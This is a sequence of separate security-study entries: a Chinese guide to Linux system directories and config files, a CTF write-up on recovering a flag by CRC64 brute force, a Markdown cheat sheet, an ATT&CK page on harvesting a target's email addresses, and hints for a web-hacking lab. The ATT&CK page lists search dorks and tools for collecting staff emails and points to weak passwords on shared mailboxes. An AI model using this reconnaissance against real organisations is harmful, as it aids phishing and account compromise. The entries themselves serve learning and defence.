从远端获取了一个字符时,该字符就会通过 m2、s2 传递给 getty 程序,而 getty 程序就会通过 s2、m2 和 telnet 程序往网络上返回”login:”字符串信息。 这样,登录程序与 telnet 程序就通过“伪终端”进行通信。通过使用适当的软件,就可以把两个甚至多个伪终端设备连接到同一个物理串行端口上。 在使用设备文件系统 (device filesystem)之前,为了得到大量的伪终端设备特殊文件,使用了比较复杂的文件名命名方式。因为只存在16个 ttyp(ttyp0—ttypf) 的设备文件,为了得到更多的逻辑设备对,就使用了如 q、r、s 等字符来代替 p。 例如,ttys8 和 ptys8 就是一个伪终端设备对,不过这种命名方式目前仍然在RedHat等Linux系统中使用着。 但 Linux 系统上的 Unix98 并不使用上述方法,而使用了”pty master”方式,例如 `/dev/ptm3`。它的对应端则会被自动地创建成 `/dev/pts/3`。这样就可以在需要时提供一个pty伪终端。 目录 `/dev/pts` 是一个类型为devpts的文件系统,并且可以在被加载文件系统列表中看到。虽然“文件” `/dev/pts/3` 看上去是设备文件系统中的一项,但其实它完全是一种不同的文件系统。 即: ``` TELNET —> TTYP3(S3: slave) —> PTYP3(M3: master) —> GETTY ``` **/dev/pts/n** 在 Xwindows 模式下的伪终端. **/dev/random 与 /dev/urandom** `/dev/random` 和 `/dev/urandom` 是 Linux 系统中提供的随机伪设备,这两个设备的任务,是提供永不为空的随机字节数据流。很多解密程序与安全应用程序(如 SSH Keys,SSL Keys 等)需要它们提供的随机数据流。 这两个设备的差异在于:`/dev/random` 的 random pool 依赖于系统中断,因此在系统的中断数不足时,`/dev/random` 设备会一直封锁,尝试读取的进程就会进入等待状态,直到系统的中断数充分够用, `/dev/random` 设备可以保证数据的随机性。`/dev/urandom` 不依赖系统的中断,也就不会造成进程忙等待,但是数据的随机性也不高。 `/dev/urandom` 是伪随机数生成器(PRND),而 `/dev/random` 是“真”随机数生成器。 使用 cat 命令可以读取 `/dev/random` 和 `/dev/urandom` 的数据流(二进制数据流,很难阅读),可以用 od 命令转换为十六进制后查看 ```bash cat /dev/random | od -x cat /dev/urandom | od -x ``` 在 cat 的过程中发现,`/dev/random` 产生的速度比较慢,有时候还会出现较大的停顿,而 `/dev/urandom` 的产生速度很快,基本没有任何停顿。 而使用 dd 命令从这些设备中 copy 数据流,发现速度差异很大: ```bash dd count=1 ibs=1024 if=/dev/random > /dev/null dd count=1 ibs=1024 if=/dev/urandom > /dev/null ``` 扩展阅读: - [On Linux’s Random Number Generation](https://research.nccgroup.com/2019/12/19/on-linuxs-random-number-generation/) **/dev/tty** 如果当前进程有控制终端(Controlling Terminal)的话,那么 `/dev/tty` 就是当前进程的控制终端的设备特殊文件。可以使用命令”ps -ax”来查看进程与哪个控制终端相连。 对于你登录的 shell,`/dev/tty` 就是你使用的终端,设备号是(5,0)。使用命令”tty”可以查看它具体对应哪个实际终端设备。`/dev/tty` 有些类似于到实际所使用终端设备的一个联接。 **/dev/ttyn, /dev/console** 在Linux 系统中,计算机显示器通常被称为控制台终端 (Console) 它仿真了类型为Linux的一种终端(TERM=Linux),并且有一些设备特殊文件与之相关联:tty0、tty1、tty2 等。 当你在控制台上登录时,使用的是 tty1。使用 Alt+[F1—F6] 组合键时,我们就可以切换到 tty2、tty3 等上面去。 tty1-tty6 等称为虚拟终端,而 tty0 则是当前所使用虚拟终端的一个别名,系统所产生的信息会发送到该终端上。 因此不管当前正在使用哪个虚拟终端,系统信息都会发送到控制台终端上。你可以登录到不同的虚拟终端上去,因而可以让系统同时有几个不同的会话存在。只有系统或超级用户 root 可以向 /dev/tty0 进行写操作 即下例: ```bash tty # 查看当前TTY echo “test tty0” > /dev/tty0 ``` **/dev/ttySn** 串行端口终端(Serial Port Terminal)是使用计算机串行端口连接的终端设备。计算机把每个串行端口都看作是一个字符设备。 有段时间这些串行端口设备通常被称为终端设备,因为那时它的最大用途就是用来连接终端。 这些串行端口所对应的设备名称是 `/dev/tts/0`(或 `/dev/ttyS0`), `/dev/tts/1`(或 `/dev/ttyS1`)等,设备号分别是(4,0), (4,1)等,分别对应于 DOS 系统下的 COM1、COM2 等。 若要向一个端口发送数据,可以在命令行上把标准输出重定向到这些特殊文件名上即可!!!! 例如,在命令行提示符下键入:`echo test > /dev/ttyS1` 会把单词”test”发送到连接在 ttyS1(COM2)端口的设备上。可接串口来实验。 --- ### /etc 这个目录用来存放所有的系统管理所需要的配置文件和子目录. **/etc/audit/auditd.conf** auditd 守护程序的默认配置文件 ```bash # 设置日志文件 log_file = /var/log/audit/audit.log log_group = root log_format = ENRICHED flush = INCREMENTAL_ASYNC freq = 50 # 设置日志文件大小,单位是MB max_log_file = 8 # 日志文件滚动的数目,如果设置为小于 2,则不会循环记录。没设置则位 0,不循环日志文件 num_logs = 5 priority_boost = 4 name_format = NONE ##name = mydomain # 日志文件到达最大值后的动作,ROTATE 是滚动记录 max_log_file_action = ROTATE ``` 更详细的配置信息请查看 https://man7.org/linux/man-pages/man5/auditd.conf.5.html , [auditd](../实验/auditd.md) **/etc/audit/audit.rules** audit 记录审计规则的文件 audit可以自定义对指定的文件或命令进行审计(如监视rm命令被执行、/etc/passwd文件内容被改变),只要配置好对应规则即可,配置规则可以通过命令行(auditctl 临时生效)或者编辑配置文件(audit.rules)两种方式来实现。 ```bash # First rule - delete all # 第一条规则--删除所有 -D ## Increase the buffers to survive stress events. ## Make this bigger for busy systems # 增加缓冲区,以度过压力事件。 -b 8192 ## This determine how long to wait in burst of events # 决定了在突发事件中要等待多长时间 --backlog_wait_time 60000 ## Set failure mode to syslog # 将故障模式设置为 syslog -f 1 ``` 监控文件系统行为 * 规则格式:-w 路径 -p 权限 -k 关键字 其中权限动作分为四种 * r 读取文件 * w 写入文件 * x 执行文件 * a 修改文件属性 ```bash # 监控 / etc/passwd 文件的修改行为 -w /etc/passwd -p wa # 如果没有 -p 选项,则默认监视所有动作 rwxa ``` 监控系统调用行为(依靠系统调用来识别) * 规则:-a 一系列动作 -S 系统调用名称 -F 字段=值 -k 关键字 ```bash # 监视文件权限变化,因为改变权限必须调用 umask -a entry,always -S umask -S chown # 监视主机名变化,因为修改主机名必须调用 sethostname -a entry,always -S sethostname -S setdomainname # 监视系统时间变化 -a entry,always -S adjtimex -S settimeofday -S stime # 设置系统日期和时间 -a entry,always -S stime # 监控用户和组ID变化 -a entry,always -S setuid -S seteuid -S setreuid -a entry,always -S setgid -S setegid -S setregid # 监控挂载 -a entry,always -S mount -S umount ``` **/etc/bashrc (ubuntu 为 /etc/bash.bashrc)** 为每一个运行 bash shell 的用户执行此文件.当 bash shell 被打开时,该文件被读取.如果你想对所有的使用 bash 的用户修改某个配置并在以后打开的 bash 都生效的话可以修改这个文件,修改这个文件不用重启,重新打开一个 bash 即可生效. Ubuntu 没有此文件,与之对应的是 `/etc/bash.bashrc` . **/etc/crontab** `/etc/crontab` 是系统的周期任务, `/etc/crontab` 是个纯文本文件,可以 root 的身份编辑这个文件 基本上,cron 服务的最低检测时间单位是分钟,所以 cron 会每分钟读取一次 `/etc/crontab` 与 `/var/spool/cron` 中的数据内容,因此,只要编辑完 `/etc/crontab` 文件并且保存之后,crontab 时设定就会自动执行。但是某些原因或在其他的 unix 系统中,由于 crontab 是读到内存中,所以在修改完 `/etc/crontab` 之后可能并不会马上执行,这时请重新启动 crond 服务。 ``` /etc/rc.d/init.d/crond restart ``` **/etc/hosts.allow** /etc/hosts.allow 和 / etc/hosts.deny 两个文件是控制远程访问设置的,通过他可以允许或者拒绝某个 ip 或者 ip 段的客户访问 linux 的某项服务。 host.allow 文件列出了允许连接到一个特定服务的主机 hosts.allow 的优先级高于 hosts.deny 这两个文件只控制对有 hosts_access 功能的服务(如 xinetd 所管理的那些服务、sshd 和某些配置的 sendmail)的访问 ```bash sshd:1.1.1.*:allow # 允许 1.1.1.* ip 段连接 sshd 服务 all:218.24.129.110 # 表示接受 110 这个 ip 的所有请求! ``` **/etc/hosts.deny** hosts.deny 文件则负责限制访问 ```bash sshd:all:deny # 禁止除 /etc/hosts.allow 以外的所有主机进行 ssh 连接 ``` 注意修改完后: ``` service xinetd restart ``` 才能让刚才的更改生效。 **/etc/ld.so.conf** `/etc/ld.so.conf.d/*` 或 `/etc/ld.so.conf` 和 ldconfig. `/etc/ld.so.conf.d/*` 目录下的文件和 `/etc/ld.so.conf` 记录了动态链接库的路径,系统默认搜索 `/lib` 和 `/usr/lib` ,在其他路径下的库文件就需在这些文件中指定。或者,还有个方法,就是设置 LD_LIBRARY_PATH 环境变量,添加其他路径,多个中间用 :分隔开。 - **ldconfig** ldconfig 是一个用来将 `/etc/ld.so.conf.d/*h` 和 `/etc/ld.so.conf` 中列出的库缓存到 `/etc/ld.so.cache` 文件中以供使用,因此在装完一些库或更新 `/etc/ld.so.conf` 文件时,需运行 `/sbin/ldconfig` 命令一下。 Linux 系统上有两类根本不同的 Linux 可执行程序。第一类是静态链接的可执行程序。静态可执行程序包含执行所需的所有函数 — 换句话说,它们是“完整的”。因为这一原因,静态可执行程序不依赖任何外部库就可以运行。 第二类是动态链接的可执行程序。 我们可以用 `ldd` 命令来确定某一特定可执行程序是否为静态链接的: ``` ldd /sbin/sln ``` 通常,动态链接的程序比其静态链接的等价程序小得多。不过,静态链接的程序可以在某些低级维护任务中发挥作用。例如,sln 是修改位于 `/lib` 中的不同库符号链接的极佳工具。但通常你会发现几乎所有 Linux 系统上的可执行程序都是某种动态链接的变体。 那么,如果动态可执行程序不包含运行所需的所有函数,Linux 的哪部分负责将这些程序和所有必需的共享库一起装入,以使它们能正确执行呢?答案是动态装入器(dynamic loader),它实际上是你在 ln 的 ldd 清单中看到的作为共享库相关性列出的 ld-linux.so.2 库。动态装入器负责装入动态链接的可执行程序运行所需的共享库。现在,让我们迅速查看一下动态装入器如何在系统上找到适当的共享库。 动态装入器找到共享库要依靠两个文件 — `/etc/ld.so.conf` 和 `/etc/ld.so.cache`。`ld.so.conf` 文件包含一个所有目录(`/lib` 和 `/usr/lib` 除外,它们会自动包含在其中)的清单,动态装入器将在其中查找共享库。 但是在动态装入器能“看到”这一信息之前,必须将它转换到 `ld.so.cache` 文件中。可以通过运行 `ldconfig` 命令做到这一点: ``` ldconfig ``` 当 `ldconfig` 操作结束时,你会有一个最新的 `/etc/ld.so.cache` 文件,它反映你对 `/etc/ld.so.conf` 所做的更改。从这一刻起,动态装入器在寻找共享库时会查看你在 `/etc/ld.so.conf` 中指定的所有新目录。 1. 往 `/lib` 和 `/usr/lib` 里面加东西,是不用修改 `/etc/ld.so.conf` 的,但是完了之后要调一下 `ldconfig` ,不然这个 library 会找不到 2. 想往上面两个目录以外加东西的时候,一定要修改 `/etc/ld.so.conf` ,然后再调用 `ldconfig` ,不然也会找不到 3. 总之,就是不管做了什么关于 library 的变动后,最好都 `ldconfig` 一下,不然会出现一些意想不到的结果。不会花太多的时间,但是会省很多的事。 **/etc/login.defs** 设置用户账户限制的配置文件,对 root 用户无效 ```bash PASS_MAX_DAYS 90 # 用户的密码最长使用天数 PASS_MIN_DAYS 0 # 两次修改密码的最小时间间隔 PASS_MIN_LEN 7 # 密码的最小长度 PASS_WARN_AGE 9 # 密码过期前多少天开始提示 ``` ```bash UID_MIN 1000 # 用户 ID 的最小值 这个代表你新建用户的 UID UID_MAX 60000 # 用户 ID 的最大值 GID_MIN 500 # 组 ID 的最小值 GID_MAX 60000 # 组 ID 的最大值 ``` ```bash ENCRYPT_METHOD SHA512 # 用 SHA512 加密密码 ``` **/etc/pam.d/** PAM(Pluggable Authentication Modules)可动态加载验证模块,因为可以按需要动态的对验证的内容进行变更,所以可以大大提高验证的灵活性。 更多内容参考 [PAM模块](./认证.md#PAM模块) **/etc/pam.d/su** su 命令配置 **etc/passwd** `/etc/passwd` 是用户数据库,其中的域给出了用户名、加密口令和用户的其他信息 `/etc/passwd` 文件中的每个用户都有一个对应的记录行,记录着这个用户的一下基本属性。`/etc/passwd` 只有系统管理员才可以修改的,该文件对所有用户可读。 更多内容参考 [认证](./认证.md#用户信息) **/etc/profile** 当一个用户登录 Linux 系统或使用 su - 命令切换到另一个用户时,也就是 Login shell 启动时,首先要确保执行的启动脚本就是 `/etc/profile` .从 `/etc/profile.d` 目录的配置文件中收集 shell 的设置.如果你有对 `/etc/profile` 有修改的话必须得 source 一下你的修改才会生效,此修改对每个用户都生效. > 敲黑板:只有 Login shell 启动时才会运行 `/etc/profile` 这个脚本,而 Non-login shell 不会调用这个脚本. 一些重要的变量就是在这个脚本文件中设置的,含义如下: - PATH: 预设可执行文件或命令的搜索路径. - USER: 用户登录时使用的用户名. - LOGNAME: 其值为 $USER. - HOSTNAME: 所使用的主机名. - MAIL: 存放用户电子邮件的邮箱(实际上是一个 ASCII 码文件). - HISTSIZE: 历史记录的行数. - INPUTRC: 存放的是针对键盘热键的信息(也是一个 ASCII 码文件). **/etc/securetty** `/etc/securetty` 文件允许你规定 root 用户可以从那个 TTY 设备登录. 登录程序(通常是 `/bin/login`)需要读取 `/etc/securetty` 文件. 列出来的 tty 设备都是允许登录的,注释掉或是在这个文件中不存在的都是不允许 root 登录的. - pts 是 pesudo tty slave,是伪终端的 slave 端 - console 好像是指当前的控制台(或者监视器),比如说你 Ctrl+Alt+x,然后 echo "123" > /dev/console,123 总会显示在你的 monitor 上. - vc 是 virtual console,也可以理解为虚拟的监视器,当你 Ctrl+Alt+x,就会切换到 vc x,在 /dev 下面没有直接对应的设备文件,不过你如果尝试 echo "123" > /dev/vcs1, 你在 monitor 上也能看到,不过要切换到对应的 vc. - vt 指的是 virtual terminal,虚拟终端 **/etc/shadow** `/etc/shadow` 是在安装了影子(shadow)口令软件的系统上的影子口令文件 在linux中,口令文件在 `/etc/passwd` 中,早期的这个文件直接存放加密后的密码,前两位是"盐"值,是一个随机数,后面跟的是加密的密码。为了安全,现在的 linux 都提供了 `/etc/shadow` 这个影子文件,密码放在这个文件里面,并且是只有 root 可读的。 Unix 系统最初是用明文保存密码的,后来由于安全的考虑,采用 crypt() 算法加密密码并存放在 `/etc/passwd` 文件。现在,由 于计算机处理能力的提高,使密码破解变得越来越容易。`/etc/passwd` 文件是所有合法用户都可访问的,大家都可互相看到密码的加密字符串,这给系统 带来很大的安全威胁。现代的 Unix 系统使用影子密码系统,它把密码从 `/etc/passwd` 文件中分离出来,真正的密码保存在 `/etc/shadow` 文件中,shadow 文件只能由超级用户访问。这样入侵者就不能获得加密密码串,用于破 解。使用 shadow 密码文件后,`/etc/passwd` 文件中所有帐户的 password 域的内容为"x",如果 password 域的内容为"*",则 该帐号被停用。使用 passwd 这个程序可修改用户的密码。 更多内容参考 [认证](./认证.md#用户信息) **/etc/sudoers** /etc/sudoers 文件以及 /etc/sudoers.d/ 目录下的文件主要是用来控制用户的访问权限的 当用户执行 sudo 时,系统会主动寻找 /etc/sudoers 文件,判断该用户是否有执行 sudo 的权限 * 确认用户具有可执行 sudo 的权限后,让用户输入用户自己的密码确认 * 若密码输入成功,则开始执行 sudo 后续的命令 /etc/sudoers 文件设置为允许用户在不输入该用户的密码的情况下使用所有命令 %表示用户组,!表示禁止执行 如设置允许 wheel 用户组中的用户在不输入该用户的密码的情况下使用所有命令 ``` %wheel ALL=(ALL) NOPASSWD: ALL ``` FOO 组可以从任何主机登陆,并且可以用 sudo -u 用户 不用输入密码执行任何命令,但是不能呢个执行 /usr/sbin 下的命令 ``` %FOO ALL=(ALL) NOPASSWD: ALL,!/usr/sbin/ ``` 允许 users 用户组中的用户像 root 用户一样使用 mount、unmount、chrom 命令 ``` %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom ``` 允许users用户组中的用户像root用户一样使用shutdown命令 ``` %users localhost=/sbin/shutdown -h now ``` 让普通用户 test 具有 / etc/init.d/nagios 脚本重启的权限 ``` test ALL=NOPASSWD:/etc/init.d/nagios restart ``` 针对 MySQL 数据库的设置,让 test 组中的 test 用户具备 / etc/init.d/mysqld 的权限 ``` groupadd test useradd -g test -m -d /home/test -s /bin/bash test passwd test visudo test ALL=(ALL) /etc/init.d/mysqld ``` 针对 tomcat 的设置,让 test 组中的 test 用户具备 tomcat 操作的权限 ``` groupadd test useradd -g test -m -d /home/test -s /bin/bash test passwd test visudo test ALL=(ALL) NOPASSWD: /usr/local/tomcat/bin/shutdown.sh,/usr/local/tomcat/bin/startup.sh ``` 更多内容参考 [认证](./认证.md#sudo) **/etc/ntp.conf** ntp 服务配置 ```bash # 服务器地址 server 0.asia.pool.ntp.org server 1.asia.pool.ntp.org server 2.asia.pool.ntp.org # 记录上次的 NTP server 与上层 NTP server 联接所花费的时间 driftfile /etc/ntp/drift # 设置默认策略为允许任何主机进行时间同步 restrict default ignore # 设置允许访问此时间服务器的时间服务的 IP 地址 # 根据自己实际情况配置 restrict 127.0.0.1    restrict 192.168.10.2 # 指定某台机器时间同步 restrict 192.168.0.0 mask 255.255.255.0 # 允许 192.168.0.0/254 子网内主机时间同步 restrict 0.0.0.0 mask 0.0.0.0 nomodify notrap # 允许任何主机跟进行时间同步 # 指定阶层编号为 10,降低其优先度。 fudge 127.127.1.1 stratum 10 # 设置 ntp 日志的 path statsdir /var/log/ntp/ # 设置 ntp 日志文件 logfile /var/log/ntp/ntp.log ``` --- ### /home 用户的主目录,在 Linux 中,每个用户都有一个自己的目录,一般该目录名是以用户的账号命名的. 比如用户 user 的主目录就是 `/home/user`,可以用 `~user` 表示; --- ### /lib 这个目录里存放着系统最基本的动态连接共享库,其作用类似于 Windows 里的 DLL 文件.几乎所有的应用程序都需要用到这些共享库. **/lib/modules** 各不同版本核心的模组 --- ### /lost+found 这个目录一般情况下是空的,当系统非法关机后,这里就存放了一些文件. --- ### /media linux 系统会自动识别一些设备,例如U盘、光驱等等,当识别后,linux 会把识别的设备挂载到这个目录下. --- ### /mnt 系统提供该目录是为了让用户临时挂载别的文件系统的,我们可以将光驱挂载在 `/mnt/` 上,然后进入该目录就可以查看光驱里的内容了. --- ### /opt 这是给主机额外安装软件所摆放的目录.比如你安装一个 ORACLE 数据库则就可以放到这个目录下.默认是空的. --- ### /proc 这个目录是一个虚拟的目录,它是系统内存的映射,我们可以通过直接访问这个目录来获取系统信息.这个目录的内容不在硬盘上而是在内存里,我们也可以直接修改里面的某些文件. **/proc/self/** 我们都知道可以通过 `/proc/$pid/` 来获取指定进程的信息,例如内存映射、CPU 绑定信息等等.如果某个进程想要获取本进程的系统信息,就可以通过进程的 pid 来访问` /proc/$pid/` 目录.但是这个方法还需要获取进程 pid,在 fork、daemon 等情况下 pid 还可能发生变化.为了更方便的获取本进程的信息,linux 提供了 `/proc/self/` 目录,这个目录比较独特,不同的进程访问该目录时获得的信息是不同的,内容等价于 `/proc/本进程 pid/`.进程可以通过访问 `/proc/self/` 目录来获取自己的系统信息,而不用每次都获取 pid. /proc/[pid], 当查看当前进程的时候可以用 /proc/self 代替 * cmdline — 启动当前进程的完整命令,但僵尸进程目录中的此文件不包含任何信息 * cwd — 指向当前进程运行目录的一个符号链接 * environ — 当前进程的环境变量列表,彼此间用空字符(NULL)隔开;变量用大写字母表示,其值用小写字母表示 --- ### /root 该目录为系统管理员,也称作超级权限者的用户主目录. **/root/anaconda-ks.cfg** 系统安装的时候生成的一个文件,通过这个文件可以修改成自动安装的脚本,用于自动安装同样配置的系统.这个配置文件经修改之后使用 Kickstart 来自动安装大量同样的操作系统, --- ### /run 是一个临时文件系统,存储系统启动以来的信息.当系统重启时,这个目录下的文件应该被删掉或清除.如果你的系统上有 `/var/run` 目录,应该让它指向 run. 转到 /run。如果你使用 df 来检查它,你会看到这样的输出: ```bash > cd /run > df -k . Filesystem 1K-blocks Used Available Use% Mounted on tmpfs 609984 2604 607380 1% /run ``` 它被识别为 “tmpfs”(临时文件系统),`/run` 中的文件和目录没有存储在磁盘上,而只存储在内存中。它们表示保存在内存(或基于磁盘的交换空间)中的数据,它看起来像是一个已挂载的文件系统,这个可以使其更易于访问和管理。 --- ### /sbin s 就是 Super 的意思,这里存放的是系统管理员使用的系统管理程序. --- ### /selinux 这个目录是 Redhat/CentOS 所特有的目录,Selinux 是一个安全机制,类似于 windows 的防火墙,但是这套机制比较复杂,这个目录就是存放 selinux 相关的文件的. --- ### /srv 该目录存放一些服务启动之后需要提取的数据.如 www 服务需要访问的网页数据存放在 `/srv/www` 内. --- ### /sys 因为 UEFI 系统会将其固件、变量和设置映射到根目录下的 `/sys` 分区里面,所以,如果在 UEFI 环境中清除根目录下的所有内容,也会同样清除 `/sys` ,这将可能会导致你丢失 UEFI 的固件设置,从而使设备变砖。 **/sys/devices/system/cpu/vulnerabilities/** CPU 漏洞修复的文件 --- ### /tmp 这个目录是用来存放一些临时文件的. --- ### /usr 这是一个非常重要的目录,用户的很多应用程序和文件都放在这个目录下,类似于 windows 下的 program files 目录. **/usr/etc** 存放配置文件 **/usr/games** 存放游戏和教学文件. **/usr/include** 开发和编译应用程序所需要的头文件. **/usr/share** 存放结构独立的数据. **/usr/bin** 系统用户使用的应用程序. **/usr/sbin** 超级用户使用的比较高级的管理程序和系统守护程序. **/usr/share/man , /usr/share/info , /usr/share/doc** 手册页、GNU信息文档和各种其他文档文件. **/usr/lib** 程序或子系统的不变的数据文件,包括一些 site-wide 配置文件,名字 lib 来源于库(library), 编程的原始库存在 `/usr/lib` 里. **/usr/local** 本地安装的软件和其他文件放在这里,`/usr/local/bin` 存放本地增加的命令,`/usr/local/include` 存放本地增加的库文件. **/usr/src** 存放程序的源代码,linux 内核的源代码存放在 `/usr/src/kernels` . --- ### /var 这个目录中存放着在不断扩充着的东西,我们习惯将那些经常被修改的目录放在这个目录下.包括各种日志文件. 这是一个非常重要的目录,系统上跑了很多程序,那么每个程序都会有相应的日志产生,而这些日志就被记录到这个目录下,具体在 `/var/log` 目录下,另外 mail 的预设放置也是在这里. **/var/catman** 当要求格式化时的 man 页的 cache.man 页的源文件一般存在 `/usr/man/man*` 中;有些 man 页可能有预格式化的版本,存在 `/usr/man/cat*` 中.而其他的 man 页在第一次看时需要格式化,格式化完的版本存在 `/var/man` 中,这样其他人再看相同的页时就无须等待格式化了. (`/var/catman` 经常被清除,就象清除临时目录一样.) **/var/lib** 系统正常运行时要改变的文件. **/var/local** `/usr/local` 安装的程序的可变数据(即系统管理员安装的程序).注意,如果必要,即使本地安装的程序也会使用其他 `/var` 目录,例如 `/var/lock` . **/var/lock** 锁定文件.许多程序遵循在 `/var/lock` 中产生一个锁定文件的约定,以支持他们正在使用某个特定的设备或文件.其他程序注意到这个锁定文件,将不试图使用这个设备或文件. **/var/log** 各种程序的 Log 文件,特别是 login (`/var/log/wtmp` log 所有到系统的登录和注销) 和 syslog (`/var/log/messages` 里存储所有核心和系统程序信息. `/var/log` 里的文件) 经常不确定地增长,应该定期清除. **/var/run** 保存到下次引导前有效的关于系统的信息文件.例如, `/var/run/utmp` 包含当前登录的用户的信息. **/var/spool,/var/mail, /var/news** 打印队列和其他队列工作的目录.每个不同的 spool 在 `/var/spool` 下有自己的子目录,例如,用户的邮箱在 `/var/spool/mail` 中. **/var/tmp** 比 `/tmp` 允许的大或需要存在较长时间的临时文件. (虽然系统管理员可能不允许 `/var/tmp` 有很旧的文件.) --- ## inode inode 译成中文就是索引节点,每个存储设备(例如硬盘)或存储设备的分区被格式化为文件系统后,应该有两部份,一部份是 inode,另一部份是 block,block 是用来存储数据用的.而 inode 呢,就是用来存储这些数据的信息,这些信息包括文件大小、属主、归属的用户组、读写权限等.inode 为每个文件进行信息索引,所以就有了 inode 的数值.linux 操作系统下可以使用 ls -id 命令来查看文件或者目录的 inode 值,一般"root"目录的 inode 值为 2,一个分区挂载到一个目录下时,这个"root"目录的 inode 值为 2 --- ## Source & Reference * [Linux 系统目录结构](https://www.runoob.com/linux/linux-system-contents.html) * [Linux目录结构及详细介绍](https://blog.csdn.net/m0_38044196/article/details/72844025) * [文件的 SUID 、SGID 、Sticky属性](https://www.linuxidc.com/Linux/2015-05/116982.htm) * [linux基础教程之特殊权限SUID、SGID和SBIT](https://www.jb51.net/article/147555.htm) * [/etc/ld.so.conf详解](https://blog.51cto.com/lsscto/904078) * [ldconfig动态链接库管理以及修改ld.so.conf.d](https://blog.csdn.net/unix21/article/details/12119861) * [探索 Linux 上的 /run](https://linux.cn/article-11008-1.html) * [Linux 网络调优:内核网络栈参数篇](https://www.starduster.me/2020/03/02/linux-network-tuning-kernel-parameter/)
sec-knowleage
# Tape, misc, 355p > We've found this priceless, old magnetic tape in our archives. We dumped the contents, but the data is corrupted and we can't read it. We only have this old tape reader tool, but source code was lost long ago. The program has only 944 bytes, so reversing it should be trivial, right? We got a FLAGZ.DAT file and a remarkably small ARM executable. Reversing it, we found it reads the file in 88 byte chunks, first 80 of which is xor of two plaintext lines, and the final 8 is CRC64 value of plaintext line. It would be enough to decrypt the file, but unfortunately the binary says there are CRC errors - and indeed, some characters get misprinted. Initially, there was only usually a single wrong character per line, which was easy to brute force (`solx.cpp`). Further lines had two or three, which with some charset narrowing and occasional manual help (it was English text, after all), was managable. The final line however, was not really bruteforceable at all: ``` : You probably just want the flag. So here it is: CTF{dZXi----------PIUTYMI}. : ``` Dashes mark unknown bytes. We know the CRC64 of the text though, so we downloaded the `crchack` tool, brute forced two characters of the flag, and asked `crchack` to find the remaining eight. If everything is printable - that's the answer. See `script.py` for implementation.
sec-knowleage
## 欢迎使用Markdown语法 语法详解请点链接: 英文版[https://guides.github.com/features/mastering-markdown/](https://guides.github.com/features/mastering-markdown/) 中文版[http://www.appinn.com/markdown/](http://www.appinn.com/markdown/) 以下是简洁版语法,相信你能用分钟学会它,然后开始写作: ```markdown 标题 # 一级标题 ## 二级标题 ### 三级标题 列表 - Bulleted - List 1. Numbered 2. List 加粗和斜体 **加粗** *斜体* 代码块(去掉\) \``` code \``` 链接和图片 [Link](url) ![Image](src) ``` For more details see [GitHub Flavored Markdown](https://guides.github.com/features/mastering-markdown/).
sec-knowleage
# T1589-002-收集目标组织身份信息-邮箱地址 ## 来自ATT&CK的描述 在入侵受害者之前,攻击者可能会收集邮件地址信息,这些信息可以在目标定位期间使用。即使存在内部实例,组织也可能具有外部的电子邮件系统和员工邮箱。 攻击者可以轻松地收集邮件地址,因为它们很容易获得并且可以通过在线或其他可访问的数据集(例如:[社交媒体](https://contribute.knowledge.qihoo.net/detail/technique/T1593/001)或[搜索受害者拥有的网站](https://contribute.knowledge.qihoo.net/detail/technique/T1594))暴露给攻击者(引自:HackersArise Email)(引自:CNET Leaks)。收集这些信息可能为如下活动提供可能性:其他形式的侦察活动(例如:[搜索开放网站/域](https://contribute.knowledge.qihoo.net/detail/technique/T1593)或[钓鱼](https://contribute.knowledge.qihoo.net/detail/technique/T1598)),建立运营资源(例如:[邮件账号](https://contribute.knowledge.qihoo.net/detail/technique/T1586/002)),或实现初始访问(例如:[钓鱼攻击](https://contribute.knowledge.qihoo.net/detail/technique/T1566))。 ## 测试案例 收集邮箱信息主要有两个作用: - 通过发现目标系统账号的命名规律,可以用来后期登入其他子系统。 - 爆破登入邮箱用。 通常邮箱的账号有如下几种生成规律: 比如某公司有员工名叫做“张小三”,它的邮箱可能如下: ```yml zhangxiaosan@xxx.com xiaosan.zhang@xxx.com zxiaosan@xxx.com ``` 当我们收集几个邮箱之后,便会大致猜出对方邮箱的命名规律。 除了员工的邮箱之外,有一些共有的邮箱,比如人力的邮箱、客服的邮箱,hr@xxx.com、kefu@xxx.com,这种邮箱有时会存在弱口令,在渗透时可额外留意一下。我们可以通过手工或者工具的方式来确定搜集邮箱: ### 手工方式 #### Google Hacking ```yml site:target.com intext:@target.com site:target.com 邮件 site:target.com email ``` #### github等第三方托管平台 在github中搜索邮箱后缀 #### 社工库的方式 #### Online Search Email 通过全球最大的几个数据泄露站点在线查询邮箱信息泄露情况 <https://monitor.firefox.com/> <https://haveibeenpwned.com/> <https://ghostproject.fr/> <https://hunter.io/> ### 工具类 #### The Harvester The Harvester可用于搜索Google、Bing和PGP服务器的电子邮件、主机以及子域名,因此需要翻墙运行该工具。 #### Infoga Infoga可从不同的公共源网络(搜索引擎,pgp密钥服务器和shodan)收集电子邮件帐户信息(ip,主机名,国家/地区)。是一个用法非常简单的工具,但是,对于渗透测试的早期阶段,或者只是为了了解自己公司在互联网上的可见性是非常有效的。 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 许多此类攻击活动的发生率很高,并且相关的误报率也很高,并且有可能发生在目标组织的视野之外,从而使防御者难以发现。 检测工作可能会集中在攻击者生命周期的相关阶段,例如在"初始访问"阶段。 ## 关联TIP [[T1589-001-收集目标组织身份信息-凭证]] [[T1589-003-收集目标组织身份信息-员工姓名]] ## 参考推荐 MITRE-ATT&CK-T1589-002 <https://attack.mitre.org/techniques/T1589/002/> 邮箱信息收集.白帽与安全 <https://www.kancloud.cn/noahs/src_hacker/2119944>
sec-knowleage
# Micro-CMS v1 ## [Flag0](./flag0) -- Found - Try creating a new page - How are pages indexed? - Look at the sequence of IDs - If the front door doesn't open, try the window - In what ways can you retrieve page contents? ## [Flag1](./flag1) -- Found - Make sure you tamper with every input - Have you tested for the usual culprits? XSS, SQL injection, path injection - Bugs often occur when an input should always be one type and turns out to be another - Remember, form submissions aren't the only inputs that come from browsers ## [Flag2](./flag2) -- Found - Sometimes a given input will affect more than one page - The bug you are looking for doesn't exist in the most obvious place this input is shown ## [Flag3](./flag3) -- Found - Script tags are great, but what other options do you have?
sec-knowleage
